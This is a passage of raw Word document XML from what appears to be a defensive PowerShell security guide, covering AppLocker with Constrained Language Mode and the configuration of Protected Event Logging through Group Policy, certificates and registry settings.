          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Cannot invoke method. Method invocation is supported only on core types in this language mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326141" w:rsidRDefault="00326141" w:rsidP="00326141">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FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>At line:1 char:1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>+ [Math]::Sqrt([Math]::Pi)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>+ ~~~~~~~~~~~~~~~~~~~~~~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>    + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE37C6" w:rsidRDefault="00326141" w:rsidP="00326141">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:ind w:left="720"/>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PS C:\&gt; '[Math]::Sqrt([Math]::Pi)' &gt; c:\trusted\trusted.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>PS C:\&gt; c:\trusted\trusted.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>1.77245385090552</w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>PS C:\&gt; exit</w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">PS C:\&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Set-AppLockerPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$existingApplockerPolicy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4F2F" w:rsidRDefault="00CE5BF5" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Beware – if users can add or edit files in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\trusted</w:t>
      </w:r>
      <w:r>
        <w:t>, then this policy offers no protection.</w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C783F">
        <w:t xml:space="preserve">Users in that situation can simply put scripts in that directory to bypass the policy. </w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:t>Also, if your AppLocker policy doesn’t similarly limit executables</w:t>
      </w:r>
      <w:r w:rsidR="004C783F">
        <w:t xml:space="preserve">, then this policy offers no protection. Users in that situation can simply </w:t>
      </w:r>
      <w:r w:rsidR="009E69D6">
        <w:t>run an executable to bypass the policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022681A" w:rsidRPr="005305B5" w:rsidRDefault="00F35285" w:rsidP="005305B5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305B5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In order to enforce its policies, AppLocker requires the </w:t>
      </w:r>
      <w:r w:rsidRPr="005305B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppIDSvc</w:t>
      </w:r>
      <w:r w:rsidRPr="005305B5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> service to be running. </w:t>
      </w:r>
      <w:r w:rsidR="00E80BF0" w:rsidRPr="005305B5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>When enabling a policy, be sure to set the service to Auto Start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252F3C" w:rsidRDefault="00252F3C" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">As mentioned previously, </w:t>
      </w:r>
      <w:r w:rsidR="00EE3D83">
        <w:t xml:space="preserve">Constrained PowerShell layers on top of the Windows permissions model. </w:t>
      </w:r>
      <w:r w:rsidR="003D6606">
        <w:t xml:space="preserve">Because of that, it </w:t>
      </w:r>
      <w:r w:rsidR="00E60247">
        <w:t>(like AppLocker) should be applied to regular user accounts and not system administrators. Administrator accounts can bypa</w:t>
      </w:r>
      <w:r w:rsidR="005359BC">
        <w:t>ss the policy by simply changing or disabling</w:t>
      </w:r>
      <w:r w:rsidR="00E60247">
        <w:t xml:space="preserve"> it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0093" w:rsidRDefault="00FE0093" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref416017909"/>
      <w:r>
        <w:t>Protected Event Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="006174D0" w:rsidRDefault="00C818CB" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">One concern </w:t>
      </w:r>
      <w:r w:rsidR="00275E54">
        <w:t>when increasing</w:t>
      </w:r>
      <w:r w:rsidR="00A2703A">
        <w:t xml:space="preserve"> the amount of logging on a system </w:t>
      </w:r>
      <w:r w:rsidR="001A0721">
        <w:t xml:space="preserve">is the danger that logged content may contain sensitive data. </w:t>
      </w:r>
      <w:r w:rsidR="00ED56C4">
        <w:t xml:space="preserve">For example, if </w:t>
      </w:r>
      <w:r w:rsidR="00056DCB">
        <w:t>you log</w:t>
      </w:r>
      <w:r w:rsidR="00ED56C4">
        <w:t xml:space="preserve"> the content of every PowerShell script that was run, there is the possibility that a script may contain credentials or other sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED56C4" w:rsidRDefault="008A45B0" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">If an attacker later compromises a machine that has logged this data, it may provide </w:t>
      </w:r>
      <w:r w:rsidR="00AC2C43">
        <w:t>them with additional information with which to extend their reach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3678" w:rsidRDefault="00F36A8C" w:rsidP="00CE3678">
      <w:r>
        <w:t>To prevent this dilemma, Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="00BE59B5">
        <w:t xml:space="preserve"> intro</w:t>
      </w:r>
      <w:r w:rsidR="00CE3678">
        <w:t>duces Protected Event Logging. Protected Event Logging lets participating applications encrypt sensitive data as they write it to the event log. You can then decrypt and process these logs once you’ve moved them to a more secure and centralized log collector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB485C" w:rsidRDefault="00BB485C" w:rsidP="00CE3678">
      <w:r>
        <w:t>One common technique to move event logs to a more secure and centralized log collector is built in to Windows: Windows Event Forwarding. A great document on setting up Windows Event Forwarding is available from the NSA: “</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00BB485C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Spotting the Adversary with Windows Event Log Monitoring</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”. Other options are System Center Operations Manager, or commercially available Security Information and Event Management (SIEM) systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556087" w:rsidRPr="00D75DE7" w:rsidRDefault="00556087" w:rsidP="00D75DE7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D75DE7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>In Windows 10, PowerShell is the only application that participates in Protected Event Logging.</w:t>
      </w:r>
      <w:r w:rsidR="00F4473B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F19DF" w:rsidRPr="007F2F0A" w:rsidRDefault="00BF779E" w:rsidP="003F19DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Protected Event Logging </w:t>
      </w:r>
      <w:r w:rsidR="009E0B72">
        <w:t>protects event log content through the IETF Cryptographic Message Syntax (CMS) standard</w:t>
      </w:r>
      <w:r w:rsidR="003F19DF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003F19DF" w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The CMS encryption standard implements public key cryptography, where the keys used to encrypt content (the </w:t>
      </w:r>
      <w:r w:rsidR="003F19DF" w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:i/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r w:rsidR="003F19DF" w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) and the keys used to decrypt content (the </w:t>
      </w:r>
      <w:r w:rsidR="003F19DF" w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:i/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r w:rsidR="003F19DF" w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>) are separate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F19DF" w:rsidRDefault="003F19DF" w:rsidP="003F19DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Your public key can be shared widely, and is not sensitive data. If any content is encrypted with this public key, only your private key can decrypt it. For more information about Public Key Cryptography, see: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="007F2F0A">
          <w:rPr>
            <w:lang w:bidi="en-US"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Public-key_cryptography</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00556087">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556087" w:rsidRPr="007F2F0A" w:rsidRDefault="00556087" w:rsidP="003F19DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When you </w:t>
      </w:r>
      <w:r w:rsidR="000C3AA5">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">implement a protected event logging policy, </w:t>
      </w:r>
      <w:r w:rsidR="008837A0">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">you deploy a public key to </w:t>
      </w:r>
      <w:r w:rsidR="008F351A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all machines that </w:t>
      </w:r>
      <w:r w:rsidR="008A48FE">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>have event log</w:t>
      </w:r>
      <w:r w:rsidR="00433A25">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> data </w:t>
      </w:r>
      <w:r w:rsidR="008A48FE">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>you want to protect.</w:t>
      </w:r>
      <w:r w:rsidR="002A24FE">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> You retain the corresponding private key </w:t>
      </w:r>
      <w:r w:rsidR="003236B6">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to post-process the event logs </w:t>
      </w:r>
      <w:r w:rsidR="0057724A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>at a more secure location such as a central event log collector</w:t>
      </w:r>
      <w:r w:rsidR="003236B6">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>, or SIEM</w:t>
      </w:r>
      <w:r w:rsidR="00F1502A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> aggregator</w:t>
      </w:r>
      <w:r w:rsidR="003236B6">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00817FB5" w:rsidP="00882495">
      <w:r>
        <w:t xml:space="preserve">To enable Protected Event Logging, </w:t>
      </w:r>
      <w:r w:rsidR="00E27DC2">
        <w:t>enable the ‘</w:t>
      </w:r>
      <w:r w:rsidR="00D23033">
        <w:t xml:space="preserve">Enable Protected Event </w:t>
      </w:r>
      <w:r w:rsidR="00E27DC2">
        <w:t xml:space="preserve">Logging’ feature in Group Policy through </w:t>
      </w:r>
      <w:r w:rsidR="00E27DC2" w:rsidRPr="001E53DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Components -&gt; Administrative Templates -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00E27DC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Logging</w:t>
      </w:r>
      <w:r w:rsidR="00E27DC2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00485B47">
        <w:t xml:space="preserve"> This setting requires an encryption certificate, which you </w:t>
      </w:r>
      <w:r w:rsidR="00E94807">
        <w:t>can provide in one of several forms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00D26F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The content of a base-64 encoded X.509 certificate (for example, as offered by the ‘Export’ option in Certificate Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00421164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The thumbprint of a certificate that can be found in the Local Machine certificate store (usually deployed by PKI infrastructure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00FC175B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The full path to a certificate (can be local, or a remote share)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00A85B2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The path to a directory containing a certificate or certificates (can be local, or a remote share)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00A85B2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The subject name of a certificate that can be found in the Local Machine certificate store (usually deployed by PKI infrastructure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="00882495" w:rsidP="00882495">
      <w:r>
        <w:t>The resulting certificate must have 'Document Encryption' as an enhanced key usage (1.3.6.1.4.1.311.80.1), as well as either Data Encipherment or Key Encipherment key usages enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A22D5F" w:rsidRDefault="0010545E" w:rsidP="00882495">
      <w:r>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidR="00943325">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r>
        <w:t>use the following PowerShell function to enable protected event logging:</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Enable-ProtectedEventLogging</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param</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</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color w:val="00BFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(Mandatory)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]</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$Certificate</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"HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging"</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8B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A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EnableProtectedEventLogging</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"1"</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Set-ItemProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$basePath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A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EncryptionCertificate</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Certificate</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C9329B" w:rsidRDefault="00C9329B" w:rsidP="0010545E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9329B" w:rsidRDefault="00C9329B" w:rsidP="00C9329B">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function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disable-ProtectedEventLogging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9329B" w:rsidRDefault="00C9329B" w:rsidP="00C9329B">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C9329B" w:rsidRDefault="00C9329B" w:rsidP="00C9329B">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Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging</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000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9329B" w:rsidRDefault="00C9329B" w:rsidP="00C9329B">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9329B" w:rsidRDefault="00C9329B"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10545E" w:rsidRDefault="0010545E" w:rsidP="0010545E">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rsidR="00F4473B" w:rsidRPr="00F4473B" w:rsidRDefault="00F4473B" w:rsidP="00882495">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">While the Group Policy template for Protected Event Logging only exists in Windows 10, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4473B">
        <w:t>PowerShell version 5 and PowerShell in KB3000850 supports protected event logging if the settings are configured manually</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF509F" w:rsidRDefault="00CF509F" w:rsidP="00882495">
      <w:r>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD18D1" w:rsidRDefault="00BD18D1" w:rsidP="00BD18D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\temp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$cert</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
